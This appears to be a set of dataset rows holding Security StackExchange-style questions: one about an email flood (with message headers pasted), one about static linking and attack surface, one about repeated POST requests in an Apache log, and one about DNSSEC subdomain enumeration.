Wed, 28 May 2014 16:58:50 -0700 (PDT)
Received-SPF: none (google.com: 482265052@attacker.com does not designate permitted sender hosts) client-ip=212.68.146.41;
Authentication-Results: mx.google.com;
spf=neutral (google.com: 482265052@attacker.com does not designate permitted sender hosts) smtp.mail=482265052@attacker.com
Received: from wv3550 ([127.0.0.1]) by WIN-EB12TG1C3GU with Microsoft SMTPSVC(7.5.7601.17514);
Thu, 29 May 2014 02:33:21 +0300
Date: Thu, 29 May 2014 02:33:21 +0300
Subject: 169992b1286fb7bb8701d0129fa8501a
To: XXXXXX@gmail.com
From:482265052@Attacker.com
Return-Path: 482265052@Attacker.com
Message-ID: <WV3550vAdxaQ6shalxy0002f4b7@WIN-EB12TG1C3GU>
X-OriginalArrivalTime: 28 May 2014 23:33:21.0825 (UTC) FILETIME=[367F9910:01CF7ACD]
Attacker Message
I just changed my email address, everything else in untouched. All 2k messages look very similar, arrived at the same minute. The only difference is the from email address and Subject (the numbers look random).
Today, I got yet another chain, this time over 7,000 email. Same methodology but this time with a different message. Here it is:
Delivered-To: XXXXXX@gmail.com
Received: by 10.58.195.142 with SMTP id ie14csp14708vec;
Fri, 30 May 2014 08:05:10 -0700 (PDT)
X-Received: by 10.180.11.37 with SMTP id n5mr6680977wib.41.1401455833882;
Fri, 30 May 2014 06:17:13 -0700 (PDT)
Return-Path: <634231594@attacker.com>
Received: from WIN-EB12TG1C3GU ([212.68.146.41])
by mx.google.com with ESMTP id cw1si4703530wib.7.2014.05.30.06.17.13
for <XXXXXX@gmail.com>;
Fri, 30 May 2014 06:17:13 -0700 (PDT)
Received-SPF: none (google.com: 634231594@attacker.com does not designate permitted sender hosts) client-ip=212.68.146.41;
Authentication-Results: mx.google.com;
spf=neutral (google.com: 634231594@attacker.com does not designate permitted sender hosts) smtp.mail=634231594@attacker.com
Received: from wv3550 ([127.0.0.1]) by WIN-EB12TG1C3GU with Microsoft SMTPSVC(7.5.7601.17514);
Fri, 30 May 2014 16:16:42 +0300
Date: Fri, 30 May 2014 16:16:42 +0300
Subject: ac2ca78349d53cfa502088e3bf537927
To: XXXXXX@gmail.com
From:634231594@Attacker.com
Return-Path: 634231594@Attacker.com
Message-ID: <WV3550kRaulR0GMhT6D00038f43@WIN-EB12TG1C3GU>
X-OriginalArrivalTime: 30 May 2014 13:16:42.0284 (UTC) FILETIME=[65E12EC0:01CF7C09]
I'm back i am Mauritanian im not using vpn or anything to hide my self
i am black from africa as You mister president
won the election we was happy because maybe we hope u will resolve all the problem
in asia africa but lol nothing just ur first jobs there in white house is to protect israel from what ?
who can beat israel
israel had nuclear bomb
plz before u going to leave white house resolve any problem syrian people and palestin and slavery in Mauritania plz do something
thanks
A search on Google returns nothing. What is that? Should I be concerned?
|
For a long time I've pondered this question. I am aware of the benefits and downsides of dynamic libraries (shared objects), including the infamous article by Drepper.
All other things being equal, isn't a statically linked binary of, say Nginx or OpenSSH, less prone to stuff like library placement or other (non-kernel) attack vectors usually used by attackers?
|
IP is hidden in apache log for privacy, except last octet.
/billing is our application start page. But it doesn't make sense that it sends POST requests, and get 500 response.
Or maybe this is legitimate old IE 7 browser who can't handle our site, ant sets into loop?
There is about 20000 such requests
xx.xx.xx.223 - - [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:55 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:55 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:56 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:56 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:56 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:56 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:58 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:58 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:58 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
xx.xx.xx.223 - - [30/May/2014:13:40:59 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
|
While it seems like a bad idea for attackers to be able to use DNSSEC to enumerate subdomains, I cannot think of a specific attack that this information enables, which would not be doable without this information.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.